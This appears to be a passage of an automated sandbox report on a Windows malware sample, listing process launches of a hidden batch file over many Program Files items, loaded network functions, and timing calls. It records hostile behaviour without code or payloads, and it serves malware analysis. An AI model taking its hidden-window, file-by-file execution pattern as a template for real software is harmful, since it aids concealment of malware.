| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" | os_pid = 0x614, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" | os_pid = 0x9f0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp" | os_pid = 0x464, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" | os_pid = 0x51c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" | os_pid = 0x4e8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" | os_pid = 0xec8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp" | os_pid = 0xde0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\WinMail.exe" | os_pid = 0x770, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" | os_pid = 0xf1c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\PDIALOG.exe" | os_pid = 0xea0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" | os_pid = 0x8e0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\dir.exe" | os_pid = 0x4b0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" | os_pid = 0x3e4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" | os_pid = 0xee8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" | os_pid = 0x408, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" | os_pid = 0x7fc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" | os_pid = 0xc60, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" | os_pid = 0xfbc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x74f40000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x74d30000 |
|
1 | |
| Get Handle | c:\users\ciihmnxmn6ps\desktop\mngrxc.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
6 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x770d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x77170000 |
|
1 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\mngrxc.exe | process_name = c:\users\ciihmnxmn6ps\desktop\mngrxc.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\mngrxc.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe, size = 261 |
|
12 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x74f595e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x74f59a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x74f5d980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x74f5a410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x74f662d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x770e7e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x77130400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x77131670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x77108460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x77109960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x77109090 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x77130910 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x771312b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x77131510 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x770ff9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x77131720 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x771318c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x770f4040 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x770f4b50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x770ff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x77101740 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x770f5a80 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x77132e50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x770f20d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x770f5240 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x770f5420 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x770f2080 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x7745baf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x773fcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x7745d120 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x77461970 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x77466640 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x773d1f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77709da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77715860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77713370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x752c2850 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x74d3dca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x74d42f20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x74d39ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x74d3d860 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x74d438d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x74d42420 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x74d3da00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x74d44030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x74d3e0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x74d433a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x74d412c0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x74d3e030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x74d41180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x74d43670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x74d43650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x74d42e90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x74d44b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x74d43f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x74d43670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x74d43650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x74d3cff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x74d44d60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x74d448e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x74d3ce20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x74d415a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x74d39560 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x74d414e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x74d39780 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x74d5c600 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x74d5c790 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x74d5b6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x74d5b820 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x74d5cad0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x74d5ccb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x74d5c920 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x74d352b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x74d34b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x74d416a0 |
|
1 |
System (4100)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = LHNIWSJ |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
12 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
4 | |
| Sleep | duration = 25 milliseconds (0.025 seconds) |
|
13 | |
| Sleep | duration = 1500 milliseconds (1.500 seconds) |
|
83 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
15 | |
| Get Time | type = Ticks, time = 141203 |
|
2 | |
| Get Time | type = Local Time, time = 2019-01-24 01:10:29 (Local Time) |
|
4 | |
| Get Time | type = Ticks, time = 141218 |
|
1 | |
| Get Time | type = Ticks, time = 141250 |
|
1 | |
| Get Time | type = Ticks, time = 144796 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-24 01:10:33 (Local Time) |
|
12 | |
| Get Time | type = Ticks, time = 144812 |
|
1 | |
| Get Time | type = Ticks, time = 144828 |
|
1 | |
| Get Time | type = Ticks, time = 144843 |
|
1 | |
| Get Time | type = Ticks, time = 144859 |
|
2 | |
| Get Time | type = Ticks, time = 174203 |
|
1 | |
| Get Time | type = Ticks, time = 174218 |
|
2 | |
| Get Time | type = Ticks, time = 174234 |
|
1 | |
| Get Time | type = Ticks, time = 174375 |
|
1 | |
| Get Time | type = Ticks, time = 175109 |
|
16 | |
| Get Time | type = Ticks, time = 175125 |
|
2 | |
| Get Time | type = Ticks, time = 175984 |
|
16 | |
| Get Time | type = Ticks, time = 176000 |
|
26 | |
| Get Time | type = Ticks, time = 176328 |
|
2 | |
| Get Time | type = Ticks, time = 176578 |
|
1 | |
| Get Time | type = Ticks, time = 177843 |
|
13 | |
| Get Time | type = Ticks, time = 178968 |
|
8 | |
| Get Time | type = Ticks, time = 179031 |
|
2 | |
| Get Time | type = Ticks, time = 179203 |
|
2 | |
| Get Time | type = Ticks, time = 179343 |
|
9 | |
| Get Time | type = Ticks, time = 179359 |
|
9 | |
| Get Time | type = Ticks, time = 179375 |
|
6 | |
| Get Time | type = Ticks, time = 181140 |
|
8 | |
| Get Time | type = Ticks, time = 181328 |
|
1 | |
| Get Time | type = Ticks, time = 181343 |
|
15 | |
| Get Time | type = Ticks, time = 181421 |
|
2 | |
| Get Time | type = Ticks, time = 182187 |
|
4 | |
| Get Time | type = Ticks, time = 182875 |
|
4 | |
| Get Time | type = Ticks, time = 182890 |
|
12 | |
| Get Time | type = Ticks, time = 182906 |
|
18 | |
| Get Time | type = Ticks, time = 182921 |
|
2 | |
| Get Time | type = Ticks, time = 183218 |
|
5 | |
| Get Time | type = Ticks, time = 183656 |
|
1 | |
| Get Time | type = Ticks, time = 184312 |
|
10 | |
| Get Time | type = Ticks, time = 184328 |
|
8 | |
| Get Time | type = Ticks, time = 184359 |
|
2 | |
| Get Time | type = Ticks, time = 184484 |
|
2 | |
| Get Time | type = Ticks, time = 184500 |
|
2 | |
| Get Time | type = Ticks, time = 184640 |
|
6 | |
| Get Time | type = Ticks, time = 184656 |
|
18 | |
| Get Time | type = Ticks, time = 184843 |
|
2 | |
| Get Time | type = Ticks, time = 184859 |
|
20 | |
| Get Time | type = Ticks, time = 185046 |
|
10 | |
| Get Time | type = Ticks, time = 185062 |
|
10 | |
| Get Time | type = Ticks, time = 185531 |
|
10 | |
| Get Time | type = Ticks, time = 185593 |
|
4 | |
| Get Time | type = Ticks, time = 185625 |
|
5 | |
| Get Time | type = Ticks, time = 185640 |
|
13 | |
| Get Time | type = Ticks, time = 185671 |
|
10 | |
| Get Time | type = Ticks, time = 185812 |
|
12 | |
| Get Time | type = Ticks, time = 185828 |
|
8 | |
| Get Time | type = Ticks, time = 186671 |
|
7 | |
| Get Time | type = Ticks, time = 186687 |
|
9 | |
| Get Time | type = Ticks, time = 186703 |
|
14 | |
| Get Time | type = Ticks, time = 188468 |
|
4 | |
| Get Time | type = Ticks, time = 189421 |
|
2 | |
| Get Time | type = Ticks, time = 189437 |
|
1 | |
| Get Time | type = Ticks, time = 190046 |
|
6 | |
| Get Time | type = Ticks, time = 190062 |
|
2 | |
| Get Time | type = Ticks, time = 190125 |
|
2 | |
| Get Time | type = Ticks, time = 190140 |
|
22 | |
| Get Time | type = Ticks, time = 190156 |
|
6 | |
| Get Time | type = Ticks, time = 190437 |
|
4 | |
| Get Time | type = Ticks, time = 190453 |
|
10 | |
| Get Time | type = Ticks, time = 190546 |
|
9 | |
| Get Time | type = Ticks, time = 190562 |
|
7 | |
| Get Time | type = Ticks, time = 190578 |
|
6 | |
| Get Time | type = Ticks, time = 190718 |
|
6 | |
| Get Time | type = Ticks, time = 191015 |
|
2 | |
| Get Time | type = Ticks, time = 191312 |
|
22 | |
| Get Time | type = Ticks, time = 191546 |
|
3 | |
| Get Time | type = Ticks, time = 191562 |
|
1 | |
| Get Time | type = Ticks, time = 191796 |
|
16 | |
| Get Time | type = Ticks, time = 191812 |
|
8 | |
| Get Time | type = Ticks, time = 191828 |
|
12 | |
| Get Time | type = Ticks, time = 191953 |
|
14 | |
| Get Time | type = Ticks, time = 192062 |
|
6 | |
| Get Time | type = Ticks, time = 192953 |
|
2 | |
| Get Time | type = Ticks, time = 192968 |
|
14 | |
| Get Time | type = Ticks, time = 192984 |
|
24 | |
| Get Time | type = Ticks, time = 193421 |
|
16 | |
| Get Time | type = Ticks, time = 193437 |
|
14 | |
| Get Time | type = Ticks, time = 193453 |
|
10 | |
| Get Time | type = Ticks, time = 193578 |
|
6 | |
| Get Time | type = Ticks, time = 193593 |
|
4 | |
| Get Time | type = Ticks, time = 193609 |
|
2 | |
| Get Time | type = Ticks, time = 193640 |
|
20 | |
| Get Time | type = Ticks, time = 193656 |
|
10 | |
| Get Time | type = Ticks, time = 193812 |
|
12 | |
| Get Time | type = Ticks, time = 194125 |
|
14 | |
| Get Time | type = Ticks, time = 194312 |
|
1 | |
| Get Time | type = Ticks, time = 194328 |
|
11 | |
| Get Time | type = Ticks, time = 194343 |
|
4 | |
| Get Time | type = Ticks, time = 194359 |
|
2 | |
| Get Time | type = Ticks, time = 194375 |
|
2 | |
| Get Time | type = Ticks, time = 194390 |
|
4 | |
| Get Time | type = Ticks, time = 194406 |
|
6 | |
| Get Time | type = Ticks, time = 194421 |
|
8 | |
| Get Time | type = Ticks, time = 194437 |
|
6 | |
| Get Time | type = Ticks, time = 194531 |
|
4 | |
| Get Time | type = Ticks, time = 195062 |
|
6 | |
| Get Time | type = Ticks, time = 195296 |
|
2 | |
| Get Time | type = Ticks, time = 195312 |
|
6 | |
| Get Time | type = Ticks, time = 195328 |
|
20 | |
| Get Time | type = Ticks, time = 195500 |
|
8 | |
| Get Time | type = Ticks, time = 195515 |
|
13 | |
| Get Time | type = Ticks, time = 195531 |
|
9 | |
| Get Time | type = Ticks, time = 195546 |
|
12 | |
| Get Time | type = Ticks, time = 195562 |
|
2 | |
| Get Time | type = Ticks, time = 195703 |
|
6 | |
| Get Time | type = Ticks, time = 195750 |
|
2 | |
| Get Time | type = Ticks, time = 195765 |
|
4 | |
| Get Time | type = Ticks, time = 195843 |
|
4 | |
| Get Time | type = Ticks, time = 195859 |
|
18 | |
| Get Time | type = Ticks, time = 195875 |
|
6 | |
| Get Time | type = Ticks, time = 196031 |
|
2 | |
| Get Time | type = Ticks, time = 196046 |
|
12 | |
| Get Time | type = Ticks, time = 196062 |
|
4 | |
| Get Time | type = Ticks, time = 196078 |
|
12 | |
| Get Time | type = Ticks, time = 196093 |
|
3 | |
| Get Time | type = Ticks, time = 196109 |
|
19 | |
| Get Time | type = Ticks, time = 196171 |
|
4 | |
| Get Time | type = Ticks, time = 196187 |
|
8 | |
| Get Time | type = Ticks, time = 196906 |
|
20 | |
| Get Time | type = Ticks, time = 196921 |
|
16 | |
| Get Time | type = Ticks, time = 196937 |
|
22 | |
| Get Time | type = Ticks, time = 197015 |
|
4 | |
| Get Time | type = Ticks, time = 197031 |
|
12 | |
| Get Time | type = Ticks, time = 197421 |
|
14 | |
| Get Time | type = Ticks, time = 197437 |
|
14 | |
| Get Time | type = Ticks, time = 197531 |
|
18 | |
| Get Time | type = Ticks, time = 197546 |
|
10 | |
| Get Time | type = Ticks, time = 197562 |
|
6 | |
| Get Time | type = Ticks, time = 197578 |
|
4 | |
| Get Time | type = Ticks, time = 197656 |
|
8 | |
| Get Time | type = Ticks, time = 197671 |
|
4 | |
| Get Time | type = Ticks, time = 197687 |
|
8 | |
| Get Time | type = Ticks, time = 197703 |
|
2 | |
| Get Time | type = Ticks, time = 197875 |
|
8 | |
| Get Time | type = Ticks, time = 197890 |
|
3 | |
| Get Time | type = Ticks, time = 197906 |
|
5 | |
| Get Time | type = Ticks, time = 197921 |
|
10 | |
| Get Time | type = Ticks, time = 197937 |
|
6 | |
| Get Time | type = Ticks, time = 198031 |
|
5 | |
| Get Time | type = Ticks, time = 198046 |
|
11 | |
| Get Time | type = Ticks, time = 198156 |
|
4 | |
| Get Time | type = Ticks, time = 198937 |
|
6 | |
| Get Time | type = Ticks, time = 198953 |
|
12 | |
| Get Time | type = Ticks, time = 198968 |
|
8 | |
| Get Time | type = Ticks, time = 198984 |
|
6 | |
| Get Time | type = Ticks, time = 200687 |
|
2 | |
| Get Time | type = Ticks, time = 200703 |
|
8 | |
| Get Time | type = Ticks, time = 200718 |
|
14 | |
| Get Time | type = Ticks, time = 200843 |
|
2 | |
| Get Time | type = Ticks, time = 200859 |
|
8 | |
| Get Time | type = Ticks, time = 200984 |
|
11 | |
| Get Time | type = Ticks, time = 201000 |
|
5 | |
| Get Time | type = Ticks, time = 201015 |
|
4 | |
| Get Time | type = Ticks, time = 201031 |
|
16 | |
| Get Time | type = Ticks, time = 201046 |
|
8 | |
| Get Time | type = Ticks, time = 201062 |
|
18 | |
| Get Time | type = Ticks, time = 201078 |
|
14 | |
| Get Time | type = Ticks, time = 201093 |
|
8 | |
| Get Time | type = Ticks, time = 201140 |
|
14 | |
| Get Time | type = Ticks, time = 201156 |
|
16 | |
| Get Time | type = Ticks, time = 201187 |
|
10 | |
| Get Time | type = Ticks, time = 201203 |
|
6 | |
| Get Time | type = Ticks, time = 201281 |
|
4 | |
| Get Time | type = Ticks, time = 201312 |
|
4 | |
| Get Time | type = Ticks, time = 201328 |
|
14 | |
| Get Time | type = Ticks, time = 201343 |
|
16 | |
| Get Time | type = Ticks, time = 201687 |
|
4 | |
| Get Time | type = Ticks, time = 201703 |
|
4 | |
| Get Time | type = Ticks, time = 201718 |
|
2 | |
| Get Time | type = Ticks, time = 201750 |
|
4 | |
| Get Time | type = Ticks, time = 201765 |
|
4 | |
| Get Time | type = Ticks, time = 201843 |
|
2 | |
| Get Time | type = Ticks, time = 201859 |
|
12 | |
| Get Time | type = Ticks, time = 201875 |
|
14 | |
| Get Time | type = Ticks, time = 201890 |
|
13 | |
| Get Time | type = Ticks, time = 202015 |
|
7 | |
| Get Time | type = Ticks, time = 202031 |
|
10 | |
| Get Time | type = Ticks, time = 202046 |
|
12 | |
| Get Time | type = Ticks, time = 202062 |
|
8 | |
| Get Time | type = Ticks, time = 202203 |
|
2 | |
| Get Time | type = Ticks, time = 202218 |
|
8 | |
| Get Time | type = Ticks, time = 202234 |
|
18 | |
| Get Time | type = Ticks, time = 202406 |
|
2 | |
| Get Time | type = Ticks, time = 202421 |
|
8 | |
| Get Time | type = Ticks, time = 202437 |
|
12 | |
| Get Time | type = Ticks, time = 202453 |
|
13 | |
| Get Time | type = Ticks, time = 202531 |
|
5 | |
| Get Time | type = Ticks, time = 202578 |
|
2 | |
| Get Time | type = Ticks, time = 202593 |
|
10 | |
| Get Time | type = Ticks, time = 202609 |
|
18 | |
| Get Time | type = Ticks, time = 202859 |
|
4 | |
| Get Time | type = Ticks, time = 202875 |
|
15 | |
| Get Time | type = Ticks, time = 202890 |
|
17 | |
| Get Time | type = Ticks, time = 202921 |
|
10 | |
| Get Time | type = Ticks, time = 202953 |
|
6 | |
| Get Time | type = Ticks, time = 202968 |
|
14 | |
| Get Time | type = Ticks, time = 203328 |
|
22 | |
| Get Time | type = Ticks, time = 203343 |
|
14 | |
| Get Time | type = Ticks, time = 203390 |
|
18 | |
| Get Time | type = Ticks, time = 203406 |
|
13 | |
| Get Time | type = Ticks, time = 203421 |
|
15 | |
| Get Time | type = Ticks, time = 203437 |
|
6 | |
| Get Time | type = Ticks, time = 203453 |
|
16 | |
| Get Time | type = Ticks, time = 203468 |
|
16 | |
| Get Time | type = Ticks, time = 203515 |
|
8 | |
| Get Time | type = Ticks, time = 203531 |
|
14 | |
| Get Time | type = Ticks, time = 203546 |
|
16 | |
| Get Time | type = Ticks, time = 203562 |
|
10 | |
| Get Time | type = Ticks, time = 203578 |
|
15 | |
| Get Time | type = Ticks, time = 258765 |
|
8 | |
| Get Time | type = Ticks, time = 258781 |
|
16 | |
| Get Time | type = Ticks, time = 258812 |
|
14 | |
| Get Time | type = Ticks, time = 258828 |
|
16 | |
| Get Time | type = Ticks, time = 258843 |
|
16 | |
| Get Time | type = Ticks, time = 258906 |
|
4 | |
| Get Time | type = Ticks, time = 258921 |
|
12 | |
| Get Time | type = Ticks, time = 258937 |
|
4 | |
| Get Time | type = Ticks, time = 259203 |
|
4 | |
| Get Time | type = Ticks, time = 259218 |
|
16 | |
| Get Time | type = Ticks, time = 259234 |
|
2 | |
| Get Time | type = Ticks, time = 259750 |
|
2 | |
| Get Time | type = Ticks, time = 259765 |
|
2 | |
| Get Time | type = Ticks, time = 259781 |
|
10 | |
| Get Time | type = Ticks, time = 259796 |
|
14 | |
| Get Time | type = Ticks, time = 261218 |
|
8 | |
| Get Time | type = Ticks, time = 261234 |
|
2 | |
| Get Time | type = Ticks, time = 261250 |
|
4 | |
| Get Time | type = Ticks, time = 262343 |
|
4 | |
| Get Time | type = Ticks, time = 262500 |
|
2 | |
| Get Time | type = Ticks, time = 262515 |
|
8 | |
